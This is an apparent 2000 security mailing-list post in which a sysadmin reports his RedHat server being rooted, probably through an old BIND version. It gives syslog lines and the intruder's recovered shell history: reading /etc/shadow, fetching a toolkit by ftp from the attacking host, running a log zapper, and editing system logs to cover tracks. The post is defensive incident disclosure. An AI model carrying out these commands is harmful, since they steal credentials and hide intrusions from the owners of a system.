OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: rooted by r0x - from address 212.177.241.127
From: Dwight Schauer (dschauerVCSD.COM)
Date: Wed Mar 29 2000 - 06:50:59 CST

A machine that I am responsible for was rooted sometime between 12:04 and 12:06
CST on Mar 28, 2000.
The machine had just had RedHat 6.1 installed and not all the updates were on
it.
I believe the intruder got in through the bind (The version that was running at
the time has know exploits, I know)

Mar 28 12:04:44 7of9 in.ftpd[15115]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.telnetd[15117]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.fingerd[15119]: refused connect from 212.177.241.127
Mar 28 12:04:45 7of9 sshd[15116]: refused connect from 212.177.241.127
Mar 28 12:06:06 7of9 in.telnetd[15125]: refused connect from 212.177.241.127

Mar 28 12:04:44 7of9 in.ftpd[15115]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.telnetd[15117]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.fingerd[15119]: refused connect from 212.177.241.127
Mar 28 12:06:06 7of9 in.telnetd[15125]: refused connect from 212.177.241.127
Mar 28 12:06:38 7of9 in.telnetd[15128]: connect from 212.177.241.127

From my named/bind default directory:
drwxr-xr-x 2 root root 1024 Mar 28 12:05 ADMROCKS

That directory was not placed there by me.
The version of bind running on the machine was bind-8.2.1-7
(It had bind-8.2.2_P3-1 before 6.1 was reinstalled on it, that update was
somehow overlooked)

Mar 28 12:06:54 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127
Mar 28 12:06:54 7of9 PAM_pwdb[15129]: (login) session opened for user r0x by
(uid=0)
Mar 28 12:09:08 7of9 sshd[15158]: Did not receive ident string from
212.177.241.127.
Mar 28 12:12:43 7of9 in.telnetd[15173]: connect from 212.177.241.127
Mar 28 12:12:59 7of9 login: LOGIN ON 3 BY r0x FROM 212.177.241.127
Mar 28 12:12:59 7of9 PAM_pwdb[15174]: (login) session opened for user r0x by
(uid=0)
Mar 28 12:14:31 7of9 in.telnetd[15192]: connect from 212.177.241.127
Mar 28 12:14:43 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127
Mar 28 12:14:43 7of9 PAM_pwdb[15193]: (login) session opened for user r0x by
(uid=0)

The cracker ran some things out /tmp and then moved on to /usr/doc/gd-1.3/
There the cracker created a directory called FAQ and dumped his payload/toolkits
in there.
An attempt was made to edit the logs, but they had already been emailed
elsewhere by logcheck.
Pico was used to edit the logs, and pico saved a backup copy, or so it appears.

This is the .bash_history from /tmp:
cd /usr
cd doc
ls
cd gd-1.3
ls
mkdir FAQ
cd FAQ
ls
pwd
cat /etc/shadow
ps uxa | grep sshd
ls
ftp 212.177.241.127
ls
tar xvfz a.tar.gz
pico ulogin.c
pico ulogin.c
cd /usr/doc/gd-1.3/FAQ
chmod +x Uaz
./UAz
./Uaz
ls
ps uxa | grep suid
kill 15189
ls
ls
ls
ls
ftp updates.redhat.com
ls
cd bin
ls
./zap2 r0x
./zap2 r0x
./zap2 r0x
dddddddddddddd
exit

The ftp to updates.redhat.com was interesting, maybe he was going to upgrade
bind for me ;-)
This is the .bash_history from roots account (in ~root) (with prior to attack
history removed)
w
w
w
w
pico /etc/passwd
pico /etc/passwd
passwd games
cd /tmp
cp /var/log/messages ./
/usr/sbin/named
mv messages /var/log
pico /var/log/messages
pico /var/log/secure
pico /var/log/secure
pico /var/log/secure

The w's could have been me. Everything prior to the w's was most definately me.
The last root access I had to the machine was on the 27th of March. (Until after
the attack)

Like I said, I believe the comprimise was through bind. If anyone thinks
otherwise, let me know.

If anyone wants them, I can give them the full log and history files, and full
payload that was
dumped on me by the cracker. 

--
Dwight Schauer <dschauervcsd.com>